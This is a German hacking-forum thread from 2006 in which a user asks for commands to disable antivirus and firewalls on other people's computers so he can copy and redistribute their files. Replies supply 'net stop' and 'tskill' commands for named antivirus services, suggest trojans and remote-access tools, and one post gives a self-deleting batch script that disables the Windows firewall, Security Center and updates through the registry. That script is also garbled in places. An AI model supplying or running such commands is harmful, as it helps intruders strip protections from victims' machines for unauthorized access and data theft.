Befehle zum deaktivieren der gängigen Antivirenprogramme

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von N30N, 7. Dezember 2006 .

Schlagworte:
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 7. Dezember 2006
    Ich brauche die Befehle zum stoppen der gängigsten Antiviren Wächter.


    Befehl dafür wäre net stop.


    Hat jemand ne Liste?



    Und bitte kein Geflame...ich brauche die Befehle um das Board mit neuem Stuff zu versorgen.
     

  2. Anzeige
  3. #2 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    naja.. kommt drauf an ob die als Dienst und/oder Prozess laufen

    mit net stop kannst du zb. dienste deaktivieren

    btw. wozu brauchst du das eig?

    (sollte das nicht lieber in den hacking bereich?)
     
  4. #3 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    net stop "AntiVir PersonalEdition Classic Guard"


    Das wäre zum Beispiel ein Weg den Antivir Guard zu stoppen.



    BTW: Es geht um relativ gering gesicherte rechner mit diversen Antivirenprogrammen, auf denen aber sehr viel Stuff liegt, größtensteils p0rns in High Quality.
     
  5. #4 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    versteh ich das richitg, da liegt shcon stuff von wem oben den du übernehmen willst?
     
  6. #5 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    Unter den Menü Punkt Sicherheit kannst du deine Firewall deaktivieren, Antiviren software deaktivieren upgraten und auch einstellen!
     
  7. #6 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    Lokal....

    jede Menge p0rnstuff auf mehreren Rechnern. Ich kann mich da nicht hinstellen und bei jedem Rechner nen Filetransfer starten, also werd ichs von woanders aus machen müssen. Dazu brauche ich die Befehle. Bin durch Zufall auf diese Quelle gestossen.


    Dann, wenn ich das Zeug hab (Schätzungsweise um die 500 Gig) werd ich einiges davon uppen denk ich.


    Sorry, aber das kann ich nicht gebrauchen, ich weiss schon wie ichs anstelle. Ich brauch die Befehle, nicht mehr ;)
     
  8. #7 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    Schieb doch en "Trojaner" hoch dann kannste doch eh alles machen was de willst ^^.
     
  9. #8 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    hm.. du kanst schaun ob es einen adaptierten kill befehl vom linux für windows gibt den kannst du dan drauf haun und prozesse ebenfals killen
     
  10. #9 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme


    Bitte les den thread erst bevor du antwortest. Und logisches Denken wäre auch ganz nett: Bevor du einen Trojaner "hochschiebst" muss das AV Programm deaktiviert werden, sonst bringt dir alles nix.


    Den versteh ich nicht :/
     
  11. #10 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    also unter linux gibt es den "kill" befehl womit du unter linux prozesse beenden kannst, ich schätz mal soetwas ähnliches gibt es für windows auch.. müstest du allerdings im net suchen und dan auf den rechner draufhaun
     
  12. #11 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    ja gibt es auch für windows:
    tskill heißt er.
    beispiel:
    Internet Explorer öffnen,
    start, ausführem tskill IEXPLORE
    und weg isses^^ Jetz brauchst du nur noch die (prozess)namen von gaaanz vielen antiviren programmen und es kann losgehen xD

    Code:
    Beendet einen Prozess.
    
    TSKILL Prozesskennung | Prozessname [/SERVER:Servername] [/ID:Sitzungskennung
    /A] [/V]
    
    Prozesskennung Kennung des abzubrechenden Prozesses.
    Prozessname Name des abzubrechenden Prozesses.
    /SERVER:Servername Enthält die Prozesskennung (Standard ist der aktuelle Serv
    ).
     /ID oder /A muss bei Verwendung von Prozessname
     und /SERVER angegeben werden.
    /ID:Sitzungskennung Beendet den Prozess, der in der angegebenen Sitzung ausgef
    rt wird.
    /A Beendet den Prozess, der in ALLEN Sitzungen ausgeführt wir
    
    /V Zeigt Informationen über die ausgeführten Funktionen an.
    
    mfg

    My-Doom
     
  13. #12 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    hehe wuste ja das es den gibt..

    bzw. doom hast nen link? =)

    hätt den selber gern in meiner sammlung


    btw.

    eine permanente lösung das die dinger deaktiviert bleiben wäre die registry einträge zu manipulieren
     
  14. #13 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    Hmm Windows Firewall hab ich hier:

    Code:
    @echo off
    net stop ; Security; Center; 
    net stop SharedAccess
    > & & %Temp%.\kill.reg & & ECHO REGEDIT4
    >> & & %Temp%.\kill.reg & & ECHO.
    >> & & %Temp%.\kill.reg & & ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
    >> & & %Temp%.\kill.reg & & ECHO & & Start; =dword:00000004
    >> & & %Temp%.\kill.reg & & ECHO.
    >> & & %Temp%.\kill.reg & & ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
    >> & & %Temp%.\kill.reg & & ECHO & & Start & & =dword:00000004
    >> & & %Temp%.\kill.reg & & ECHO.
    >> & & %Temp%.\kill.reg & & ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
    >> & & %Temp%.\kill.reg & & ECHO ; Start; =dword:00000004
    >> & & %Temp%.\kill.reg & & ECHO.
    START /WAIT REGEDIT /S %Temp%.\kill.reg
    DEL & & %Temp%.\kill.reg
    DEL %0
    
     
  15. #14 7. Dezember 2006
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    zB:

    Code:
    C:\WINDOWS\system32>net start
    These Windows services are started:
    
     Cryptographic Services
     DCOM Server Process Launcher
     DHCP Client
     Event Log
     Kaspersky Internet Security 6.0
     Logical Disk Manager
     Network Connections
     O&O Defrag
     Plug and Play
     Print Spooler
     Remote Access Connection Manager
     Remote Procedure Call (RPC)
     System Restore Service
     Telephony
     Terminal Services
     Windows Audio
     Windows Image Acquisition (WIA)
     Windows Management Instrumentation
     Workstation
    bei den meisten avs reicht danach das simple stoppen aller antiviren-prozesse, in diesem fall:
    Code:
    net stop "Kaspersky Internet Security 6.0"
    ps: tlist kannst vergessen für prozesse jenseits IE => pskill oder sowas..

    sonst per remote desktop (oder sonstigem RAT) einloggen und AV ganz einfach deaktivieren ^^

    pps: win firewall kannst auch einfach mit 2 commands bypassen:

    Code:
    netsh ... ...
    (selbst bisschen suchen ^^)
     
  16. #15 29. Januar 2007
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    hoi

    z.b. net stop Sygate Personal Firewall Pro
    oda net stop AntiVir PersonalEdition Classic Planer
    net stop AntiVir PersonalEdition Classic Guard
    net stop Kaspersky Internet Security 6.0
    net stop cFosSpeed System Service den kannste eigentlich auch killen dann kann er den traffic nich sehen falls ers installiert hat
    bei diensten, prossesen mit mehreren wörter am anfang und ende die " nicht vergessen

    aber wenn du schon drauf bist warum guckste nich erst einfach mit
    nen simplen "net start" was alles aktiv is ? ^^
    sorry für die blöde frage aber ...

    greetz luke
     
  17. #16 30. Januar 2007
    AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

    link wohin?
    das is ein einfacher auszug aus der Konsole (cmd), den auch du bekommst wenn du in die cmd (start->ausführen_>cmd->)tskill eingibst..

    Und joa, ich denke auch, dass eben durch entsprechende manipulation in der regitry der autostart verhindert werden kann.. ebenfalls könnteste eine simple bat schreiben..
    1. ausgabe nach nul leiten ("@echo off "style^^) (das nix angezeigt wird) [sorry, ich weiß den genauen befehl grad nich xD)
    2. net stop Antivir service
    3. tskill avprozess.exe
    4. del "Pfad zur exe des Av's oder so"^^

    mfg

    My-DOom

    pS. Daedalus, magst du nich den 2. command auch noch verraten^^ xD
     

  18. Videos zum Thema
Die Seite wird geladen...